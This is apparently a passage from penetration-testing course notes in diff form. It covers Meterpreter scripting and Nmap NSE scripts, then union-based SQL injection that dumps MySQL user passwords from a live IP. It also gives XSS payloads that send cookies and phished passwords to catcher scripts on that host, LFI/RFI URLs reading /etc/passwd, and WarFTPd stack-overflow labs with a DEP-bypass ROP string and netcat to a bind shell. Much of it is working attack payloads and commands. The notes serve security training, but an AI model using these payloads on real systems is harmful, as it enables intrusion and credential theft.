1003
    r=''
1004
    session.response_timeout=120
1005
    cmdlst.each do |cmd|
1006
       begin
1007
          print_status "running command #{cmd}"
1008
          r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
1009
          while(d = r.channel.read)
1010
 
1011
             print_status("#{d}")
1012
          end
1013
          r.channel.close
1014
          r.close
1015
       rescue ::Exception => e
1016
          print_error("Error Running Command #{cmd}: #{e.class} #{e}")
1017
       end
1018
    end
1019
 end
1020
 
1021
commands = [ "set",
1022
    "ipconfig  /all",
1023
    "arp -a"]
1024
 
1025
list_exec(client,commands)
1026
------------------------------------------------------------------------
1027
 
1028
 
1029
- Run the script:
1030
---------------------------Type This-----------------------------------
1031
meterpreter> run helloworld
1032
----------------------------------------------------------------------- 
1033
 
1034
1035
1036
1037
#########################
1038
# Meterpreter Challenge #
1039
#########################
1040
Note: Add all of the commands from the script below to your helloworld.rb script:
1041
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
1042
 
1043
 
1044
 
1045
---------------------------------------------------------------------------------
1046
1047
1048
1049
#####################################
1050
# Writing Your Own Nmap NSE Scripts #
1051
#####################################
1052
 
1053
 
1054
----------------------------------------------------------------------
1055
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1056
 
1057
-- The Head Section --
1058
-- The Rule Section --
1059
portrule = function(host, port)
1060
    return port.protocol == "tcp"
1061
            and port.number == 80
1062
            and port.state == "open"
1063
end
1064
 
1065
-- The Action Section --
1066
action = function(host, port)
1067
    return "Munich Hacking!"
1068
end
1069
----------------------------------------------------------------------
1070
 
1071
- Ok, now that we've made that change let's run the script
1072
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
1073
 
1074
 
1075
 
1076
 
1077
 
1078
 
1079
----------------------------------------------------------------------
1080
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1081
 
1082
-- The Head Section --
1083
local shortport = require "shortport"
1084
 
1085
-- The Rule Section --
1086
portrule = shortport.http
1087
 
1088
 
1089
-- The Action Section --
1090
action = function(host, port)
1091
    return "Munich Hacking!"
1092
end
1093
----------------------------------------------------------------------
1094
 
1095
- Ok, now that we've made that change let's run the script
1096
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
1097
 
1098
 
1099
 
1100
 
1101
 
1102
 
1103
 
1104
OK, now let's have some fun with my buddy Carlos Perez's website.
1105
 
1106
----------------------------------------------------------------------
1107
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1108
 
1109
-- The Head Section --
1110
local shortport = require "shortport"
1111
local http = require "http"
1112
 
1113
-- The Rule Section --
1114
portrule = shortport.http
1115
 
1116
-- The Action Section --
1117
action = function(host, port)
1118
 
1119
    local uri = "/installing-metasploit-in-ubunt/"
1120
    local response = http.get(host, port, uri)
1121
    return response.status
1122
 
1123
end
1124
----------------------------------------------------------------------
1125
 
1126
- Ok, now that we've made that change let's run the script
1127
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
1128
 
1129
 
1130
 
1131
 
1132
----------------------------------------------------------------------
1133
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1134
 
1135
-- The Head Section --
1136
local shortport = require "shortport"
1137
local http = require "http"
1138
 
1139
-- The Rule Section --
1140
portrule = shortport.http
1141
 
1142
-- The Action Section --
1143
action = function(host, port)
1144
 
1145
    local uri = "/installing-metasploit-in-ubunt/"
1146
    local response = http.get(host, port, uri)
1147
 
1148
    if ( response.status == 200 ) then
1149
        return response.body
1150
    end
1151
 
1152
end
1153
----------------------------------------------------------------------
1154
 
1155
- Ok, now that we've made that change let's run the script
1156
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
1157
 
1158
 
1159
 
1160
 
1161
 
1162
 
1163
 
1164
 
1165
 
1166
----------------------------------------------------------------------
1167
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1168
 
1169
-- The Head Section --
1170
local shortport = require "shortport"
1171
local http = require "http"
1172
local string = require "string"
1173
 
1174
-- The Rule Section --
1175
portrule = shortport.http
1176
 
1177
-- The Action Section --
1178
action = function(host, port)
1179
 
1180
    local uri = "/installing-metasploit-in-ubunt/"
1181
    local response = http.get(host, port, uri)
1182
 
1183
    if ( response.status == 200 ) then
1184
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
1185
        return title
1186
    end
1187
 
1188
end
1189
----------------------------------------------------------------------
1190
 
1191
- Ok, now that we've made that change let's run the script
1192
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
1193
 
1194
 
1195
 
1196
 
1197
 
1198
 
1199
 
1200
----------------------------------------------------------------------
1201
sudo vi /usr/share/nmap/scripts/intro-nse.nse
1202
 
1203
-- The Head Section --
1204
local shortport = require "shortport"
1205
local http = require "http"
1206
local string = require "string"
1207
 
1208
-- The Rule Section --
1209
portrule = shortport.http
1210
 
1211
-- The Action Section --
1212
action = function(host, port)
1213
 
1214
    local uri = "/installing-metasploit-in-ubunt/"
1215
    local response = http.get(host, port, uri)
1216
 
1217
    if ( response.status == 200 ) then
1218
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
1219
 
1220
        if (title) then
1221
            return "Vulnerable"
1222
        else
1223
            return "Not Vulnerable"
1224
        end
1225
    end
1226
end
1227
 
1228
----------------------------------------------------------------------
1229
 
1230
- Ok, now that we've made that change let's run the script
1231
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
1232
 
1233
 
1234
 
1235
1236
################################
1237
# Attack Environment Deployers #
1238
################################
1239
https://github.com/mantvydasb/Red-Team-Infrastructure-Automation
1240
1241
1242
1243
1244
#################
1245
# Lab Deployers #
1246
#################
1247
https://github.com/jaredhaight/PowerShellClassLab
1248
https://github.com/outflanknl/Invoke-ADLabDeployer
1249
https://github.com/AutomatedLab/AutomatedLab
1250
1251
1252
1253
1254
###############
1255
# Persistence #
1256
###############
1257
https://rastamouse.me/2018/03/a-view-of-persistence/
1258
https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
1259
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
1260
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
1261
1262
1263
1264
1265
####################
1266
# Lateral Movement #
1267
####################
1268
1269
1270
###########################
1271
# Bypassing EDR Solutions #
1272
###########################
1273
https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
1274
https://github.com/vysecurity/morphHTA
1275
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
1276
 
1277
1278
#######################
1279
# Attacking PHP/MySQL #
1280
#######################
1281
 
1282
Go to LAMP Target homepage
1283
---------------------------Paste this into Firefox-----------------------------------
1284
http://45.63.104.73/
1285
-------------------------------------------------------------------------------------
1286
 
1287
 
1288
Clicking on the Acer Link:
1289
---------------------------Paste this into Firefox-----------------------------------
1290
http://45.63.104.73/acre2.php?lap=acer
1291
-------------------------------------------------------------------------------------
1292
 
1293
    - Found parameter passing (answer yes to question 1)
1294
    - Insert ' to test for SQLI
1295
 
1296
---------------------------Paste this into Firefox-----------------------------------
1297
http://45.63.104.73/acre2.php?lap=acer'
1298
-------------------------------------------------------------------------------------  
1299
 
1300
Page returns the following error:
1301
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
1302
 
1303
 
1304
 
1305
In order to perform union-based sql injection - we must first determine the number of columns in this query.
1306
We do this using the ORDER BY
1307
---------------------------Paste this into Firefox-----------------------------------
1308
http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
1309
-------------------------------------------------------------------------------------
1310
 
1311
 
1312
Page returns the following error:
1313
Unknown column '100' in 'order clause'
1314
 
1315
 
1316
---------------------------Paste this into Firefox-----------------------------------
1317
http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
1318
-------------------------------------------------------------------------------------  
1319
 
1320
 
1321
Page returns the following error:
1322
Unknown column '50' in 'order clause'
1323
 
1324
 
1325
---------------------------Paste this into Firefox-----------------------------------
1326
http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
1327
-------------------------------------------------------------------------------------
1328
 
1329
Page returns the following error:
1330
Unknown column '25' in 'order clause'
1331
 
1332
 
1333
---------------------------Paste this into Firefox-----------------------------------
1334
http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
1335
-------------------------------------------------------------------------------------
1336
 
1337
Page returns the following error:
1338
Unknown column '12' in 'order clause'
1339
 
1340
 
1341
---------------------------Paste this into Firefox-----------------------------------
1342
http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
1343
-------------------------------------------------------------------------------------
1344
---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
1345
 
1346
 
1347
 
1348
Now we build out the union all select statement with the correct number of columns
1349
 
1350
Reference:
1351
http://www.techonthenet.com/sql/union.php
1352
 
1353
 
1354
---------------------------Paste this into Firefox-----------------------------------
1355
http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
1356
-------------------------------------------------------------------------------------
1357
 
1358
 
1359
 
1360
Now we negate the parameter value 'acer' by turning into the word 'null':
1361
 
1362
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
1363
-------------------------------------------------------------------------------------
1364
 
1365
We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
1366
 
1367
 
1368
Use a cheat sheet for syntax:
1369
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
1370
 
1371
---------------------------Paste these one line at a time into Firefox-----------------------------------
1372
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
1373
 
1374
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
1375
 
1376
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
1377
 
1378
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
1379
 
1380
http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
1381
------------------------------------------------------------------------------------- -------------------
1382
 
1383
 
1384
 
1385
 
1386
Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
1387
 
1388
Here is a good reference for it:
1389
https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
1390
 
1391
Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
1392
 
1393
 
1394
 
1395
###############################################################################
1396
# What is XSS                                                                 #
1397
# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx            #
1398
###############################################################################
1399
 
1400
OK - what is Cross Site Scripting (XSS)
1401
 
1402
1. Use Firefox to browse to the following location:
1403
    ---------------------------Paste this into Firefox-----------------------------------
1404
    http://45.63.104.73/xss_practice/
1405
    -------------------------------------------------------------------------------------
1406
 
1407
    A really simple search page that is vulnerable should come up.
1408
 
1409
 
1410
 
1411
 
1412
2. In the search box type:
1413
    ---------------------------Paste this into Firefox-----------------------------------
1414
    <script>alert('So this is XSS')</script>
1415
    -------------------------------------------------------------------------------------
1416
 
1417
 
1418
    This should pop-up an alert window with your message in it proving XSS is in fact possible.
1419
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1420
 
1421
 
1422
3. In the search box type:
1423
    ---------------------------Paste this into Firefox-----------------------------------
1424
    <script>alert(document.cookie)</script>
1425
    -------------------------------------------------------------------------------------
1426
 
1427
 
1428
    This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
1429
    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1430
 
1431
4. Now replace that alert script with:
1432
    ---------------------------Paste this into Firefox-----------------------------------
1433
    <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
1434
    -------------------------------------------------------------------------------------
1435
 
1436
This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
1437
 
1438
 
1439
5. Now view the stolen cookie at:
1440
   ---------------------------Paste this into Firefox-----------------------------------
1441
   http://45.63.104.73/xss_practice/cookie_stealer_logs.html
1442
   -------------------------------------------------------------------------------------  
1443
 
1444
The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
1445
 
1446
 
1447
 
1448
 
1449
 
1450
 
1451
############################
1452
# A Better Way To Demo XSS #
1453
############################
1454
 
1455
 
1456
Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
1457
 
1458
 
1459
Use Firefox to browse to the following location:
1460
---------------------------Paste this into Firefox-----------------------------------
1461
    http://45.63.104.73/xss_practice/
1462
-------------------------------------------------------------------------------------  
1463
 
1464
 
1465
Paste this in the search box
1466
----------------------------
1467
 
1468
 
1469
Option 1
1470
--------
1471
---------------------------Paste this into Firefox-----------------------------------
1472
<script>
1473
password=prompt('Your session is expired. Please enter your password to continue',' ');
1474
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
1475
</script>
1476
-------------------------------------------------------------------------------------  
1477
 
1478
Now view the stolen cookie at:
1479
---------------------------Paste this into Firefox-----------------------------------
1480
    http://45.63.104.73/xss_practice/passwords.html
1481
-------------------------------------------------------------------------------------  
1482
 
1483
 
1484
Option 2
1485
--------
1486
-------------------------Paste this into Firefox-----------------------------------
1487
<script>
1488
username=prompt('Please enter your username',' ');
1489
password=prompt('Please enter your password',' ');
1490
document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
1491
</script>
1492
-------------------------------------------------------------------------------------  
1493
 
1494
 
1495
 
1496
Now view the stolen cookie at:
1497
http://45.63.104.73/xss_practice/username_password_logs.html
1498
 
1499
 
1500
 
1501
 
1502
#########################################
1503
# Let's try a local file include (LFI)  #
1504
#########################################
1505
- Here is an example of an LFI
1506
- Open this page in Firefox:
1507
-------------------------Paste this into Firefox-----------------------------------
1508
http://45.63.104.73/showfile.php?filename=contactus.txt
1509
-------------------------------------------------------------------------------------
1510
 
1511
 
1512
- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
1513
- Here you see a direct reference to a file on the local filesystem of the victim machine.
1514
- You can attack this by doing the following:
1515
-------------------------Paste this into Firefox-----------------------------------
1516
http://45.63.104.73/showfile.php?filename=/etc/passwd
1517
-------------------------------------------------------------------------------------
1518
 
1519
 
1520
- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
1521
- somewhere else on the Internet. Here is an example of a text file on the web:
1522
-------------------------Paste this into Firefox-----------------------------------
1523
http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
1524
-------------------------------------------------------------------------------------
1525
 
1526
- Now we can attack the target via RFI like this:
1527
-------------------------Paste this into Firefox-----------------------------------
1528
http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
1529
-------------------------------------------------------------------------------------
1530
 
1531
 
1532
 
1533
###############################
1534
# How much fuzzing is enough? #
1535
###############################
1536
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1537
 
1538
Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1539
 
1540
 
1541
Step 1: Ask yourself the 3 questions per page of the site.
1542
 
1543
Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1544
 
1545
Step 3: When you load your fuzz strings - use the following decision tree
1546
 
1547
    - Are the fuzz strings causing a default error message (example 404)?
1548
        - If this is the case then it is most likely NOT vulnerable
1549
 
1550
    - Are the fuzz strings causing a WAF or LB custom error message?
1551
        - If this is the case then you need to find an encoding method to bypass
1552
 
1553
 
1554
    - Are the fuzz strings causing an error message that discloses the backend type?
1555
        - If yes, then identify DB type and find correct syntax to successfully exploit
1556
        - Some example strings that I use are:
1557
            '
1558
            "
1559
            ()          <----- Take the parameter value and put it in parenthesis
1560
            (5-1)       <----- See if you can perform an arithmetic function
1561
 
1562
 
1563
    - Are the fuzz strings rendering executable code?
1564
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1565
        - Some example strings that I use are:
1566
            <b>hello</b>
1567
            <u>hello</u>
1568
            <script>alert(123);</script>
1569
            <script>alert(xss);</script>
1570
            <script>alert('xss');</script>
1571
            <script>alert("xss");</script>
1572
 
1573
 
1574
###############################################################
1575
# Question 1: What is the process that you use when you test? #
1576
###############################################################
1577
 
1578
Step 1: Automated Testing
1579
 
1580
Step 1a: Web Application vulnerability scanners
1581
-----------------------------------------------
1582
- Run two (2) unauthenticated vulnerability scans against the target
1583
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
1584
- Run two (2) authenticated vulnerability scans against the target with admin privileges
1585
 
1586
The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
1587
 
1588
A good web application vulnerability scanner comparison website is here:
1589
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
1590
 
1591
 
1592
Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1593
 
1594
When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1595
 
1596
 
1597
Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
1598
 
1599
 
1600
Also, be sure to save the scan results and logs. I usually provide this data to the customer.
1601
 
1602
 
1603
 
1604
Step 1b: Directory Brute Forcer
1605
-------------------------------
1606
I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
1607
 
1608
 
1609
 
1610
Step 2: Manual Testing
1611
 
1612
Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
1613
 
1614
Step 2a: Spider/Scan the entire site with Burp Suite
1615
Save the spider and scan results. I usually provide this data to the customer as well.
1616
 
1617
 
1618
Step 2b: Browse through the site using the 3 question method
1619
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
1620
 
1621
Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
1622
 
1623
Here is what I mean:
1624
http://www.site.com/page.aspx?parametername=parametervalue
1625
 
1626
When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
1627
 
1628
http://www.site.com/page.aspx?parametername=[ payload ]
1629
 
1630
You need to ensure that you send the payload this way, and like this below:
1631
 
1632
http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
1633
 
1634
This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
1635
 
1636
 
1637
 
1638
 
1639
 
1640
 
1641
 
1642
###########################################
1643
# Question 2: How much fuzzing is enough? #
1644
###########################################
1645
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1646
 
1647
Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1648
 
1649
 
1650
Step 1: Ask yourself the 3 questions per page of the site.
1651
 
1652
Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1653
 
1654
Step 3: When you load your fuzz strings - use the following decision tree
1655
 
1656
    - Are the fuzz strings causing a default error message (example 404)?
1657
        - If this is the case then it is most likely NOT vulnerable
1658
 
1659
    - Are the fuzz strings causing a WAF or LB custom error message?
1660
        - If this is the case then you need to find an encoding method to bypass
1661
 
1662
 
1663
    - Are the fuzz strings causing an error message that discloses the backend type?
1664
        - If yes, then identify DB type and find correct syntax to successfully exploit
1665
        - Some example strings that I use are:
1666
            '
1667
            "
1668
            ()          <----- Take the parameter value and put it in parenthesis
1669
            (5-1)       <----- See if you can perform an arithmetic function
1670
 
1671
 
1672
    - Are the fuzz strings rendering executable code?
1673
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1674
        - Some example strings that I use are:
1675
            <b>hello</b>
1676
            <u>hello</u>
1677
            <script>alert(123);</script>
1678
            <script>alert(xss);</script>
1679
            <script>alert('xss');</script>
1680
            <script>alert("xss");</script>
1681
 
1682
 
1683
 
1684
 
1685
 
1686
 
1687
 
1688
-------------------------------------------------------------------------------------------
1689
 OWASP Top 10 Video Explanations
1690
 
1691
Burp Suite Reference:
1692
https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
1693
 
1694
A1: Injection Vulnerabilities
1695
https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
1696
 
1697
 
1698
A2: Broken Authentication and Session Management
1699
https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2
1700
 
1701
A3: Cross Site Scripting (XSS)
1702
https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4
1703
 
1704
A4: Insecure Direct Object Reference
1705
https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5
1706
 
1707
 
1708
A5: Security Misconfiguration
1709
https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
1710
 
1711
 
1712
A6: Sensitive Data Exposure
1713
https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8
1714
 
1715
 
1716
A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
1717
https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
1718
 
1719
A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
1720
https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10
1721
 
1722
 
1723
 
1724
 
1725
1726
1727
1728
1729
1730
1731
1732-
stepi
1732+
1733
1734
Day 2
1735
=-------------------------------------------------------------------------
1736
1737
1738
###########################
1739
# Lab 1a: Stack Overflows #
1740
###########################
1741
 
1742
    #################################
1743
    # Start WarFTPd                 #
1744
    # Start WinDBG                  #
1745
    # Press F6                      #
1746
    # Attach to war-ftpd.exe        #
1747
    #################################
1748
 
1749
---------------------------Type This-----------------------------------
1750
c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
1751
-----------------------------------------------------------------------
1752
 
1753
    At WINDBG prompt
1754
    “r” to show registers or “alt+4”
1755
 
1756
---------------------------Type This-----------------------------------
1757
    0:003> dd eip
1758
    0:003> dd esp
1759
-----------------------------------------------------------------------
1760
 
1761
---------------------------Type This-----------------------------------
1762
 
1763
c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
1764
-----------------------------------------------------------------------
1765
 
1766
 
1767
    At WINDBG prompt
1768
    “r” to show registers or “alt+4”
1769
 
1770
---------------------------Type This-----------------------------------
1771
 
1772
    0:003> dd eip
1773
    0:003> dd esp
1774
-----------------------------------------------------------------------
1775
 
1776
    Eip: 32714131
1777
    esp: affd58     (71413471)
1778
 
1779
    Now we need to SSH into the StrategicSec Ubuntu host
1780
 
1781
---------------------------Type This-----------------------------------
1782
 
1783
    cd /usr/share/metasploit-framework/tools/exploit/
1784
 
1785
    ./pattern_offset.rb -q 32714131
1786
    485
1787
   
1788
    ./pattern_offset.rb -q 71413471
1789
    493
1790
-----------------------------------------------------------------------
1791
 
1792
    Distance to EIP is:         	485
1793
    Relative position of ESP is:    493
1794
 
1795
    RET – POP EIP
1796
    RET 4 – POP EIP and shift ESP down by 4 bytes
1797
 
1798
---------------------------Type This-----------------------------------
1799
 
1800
    wget https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/msfpescan
1801
    mkdir DLLs
1802
    ./msfpescan -j ESP DLLs/shell32.dll
1803
-----------------------------------------------------------------------
1804
 
1805
        0x7c9c167d push esp; retn 0x304d
1806
        0x7c9d30d7 jmp esp < - how about we use this one
1807
        0x7c9d30eb jmp esp
1808
        0x7c9d30ff jmp esp
1809
 
1810
 
1811
        warftpd3.py with Notepad++
1812
        Fill in the appropriate values
1813
        Distance to EIP
1814
        Address of JMP ESP
1815
 
1816
 
1817
---------------------------Type This-----------------------------------
1818
 
1819
c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
1820
 
1821
    0:003> dd eip
1822
    0:003> dd esp
1823
-----------------------------------------------------------------------
1824
 
1825
 
1826
 
1827
 
1828
 
1829
    Mention bad characters
1830
    No debugger
1831
 
1832
 
1833
---------------------------Type This-----------------------------------
1834
 
1835
c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
1836
 
1837
nc XPSP3-ED-Target-IP 4444
1838
-----------------------------------------------------------------------
1839
 
1840
 
1841
 
1842
###########################################
1843
# Lab 1b: Stack Overflows with DEP Bypass #
1844
###########################################
1845
 
1846
Reboot your target host and choose the "2nd" option for DEP.
1847
 
1848
 
1849
 
1850
 
1851
---------------------------Type This-----------------------------------
1852
 
1853
c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
1854
 
1855
    At WINDBG prompt
1856
    “r” to show registers or “alt+4”
1857
 
1858
    dd esp
1859
 
1860
 
1861
 
1862
 
1863
c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
1864
 
1865
 
1866
    At WINDBG prompt
1867
    “r” to show registers or “alt+4”
1868
    dd esp
1869
-----------------------------------------------------------------------
1870
 
1871
    Eip: 32714131
1872
    esp: affd58     (71413471)
1873
 
1874
    Now we need to SSH into the StrategicSec Ubuntu host
1875
 
1876
---------------------------Type This-----------------------------------
1877
 
1878
    cd /home/strategicsec/toolz/metasploit/tools
1879
 
1880
    ruby pattern_offset.rb 32714131
1881
    485
1882
   
1883
    ruby pattern_offset.rb 71413471
1884
    493
1885
 
1886
 
1887
 
1888
 
1889
 
1890
 
1891
 
1892
 
1893
cd /home/strategicsec/toolz/metasploit/tools
1894
 
1895
ruby pattern_offset.rb 32714131
1896
 
1897
cd /home/strategicsec/toolz/metasploit/
1898
 
1899
./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
1900
 
1901
 
1902
 
1903
c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
1904
 
1905
    0:003> dd eip
1906
    0:003> dd esp
1907
 
1908
INT3s - GOOD!!!!!!!
1909
 
1910
 
1911
 
1912
c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
1913
 
1914
nc XPSP3-ED-Target-IP 4444
1915
-----------------------------------------------------------------------
1916
 
1917
 
1918
strategicsec....exploit no workie!!!!
1919
 
1920
 
1921
Why????????? DEP!!!!!!!!!!!!!
1922
 
1923
 
1924
 
1925
 
1926
Let's look through ole32.dll for the following instructions:
1927
 
1928
mov al,0x1
1929
ret 0x4
1930
 
1931
We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
1932
 
1933
 
1934
---------------------------Type This-----------------------------------
1935
 
1936
./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
1937
-----------------------------------------------------------------------
1938
 
1939
[DLLs/xpsp3/ole32.dll]
1940
0x775ee00e b001c204
1941
0x775ee00e      mov al, 1
1942
0x775ee010      ret 4
1943
 
1944
 
1945
Then we need to jump to the LdrpCheckNXCompatibility routine in
1946
ntdll.dll that disables DEP.
1947
 
1948
 
1949
 
1950
Inside of ntdll.dll we need to find the following instructions:
1951
 
1952
CMP AL,1
1953
PUSH 2
1954
POP ESI
1955
JE ntdll.7
1956
 
1957
 
1958
---------------------------Type This-----------------------------------
1959
 
1960
./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
1961
-----------------------------------------------------------------------
1962
 
1963
[DLLs/xpsp3/ntdll.dll]
1964
0x7c91cd24 3c016a025e0f84
1965
0x7c91cd24      cmp al, 1
1966
0x7c91cd26      push 2
1967
0x7c91cd28      pop esi
1968
0x7c91cd29      jz 7
1969
 
1970
 
1971
This set of instructions makes sure that AL is set to 1, 2 is pushed
1972
on the stack then popped into ESI.
1973
 
1974
 
1975
 
1976
 
1977
---------------------------Type This-----------------------------------
1978
 
1979
dep = "\x0e\xe0\x5e\x77"+\
1980
"\xff\xff\xff\xff"+\
1981
"\x24\xcd\x91\x7c"+\
1982
"\xff\xff\xff\xff"+\
1983
"A"*0x54
1984
 
1985
 
1986
 
1987
 
1988
c:\python27\python.exe warftpd5.py XPSP3-ED-Target-IP
1989
 
1990
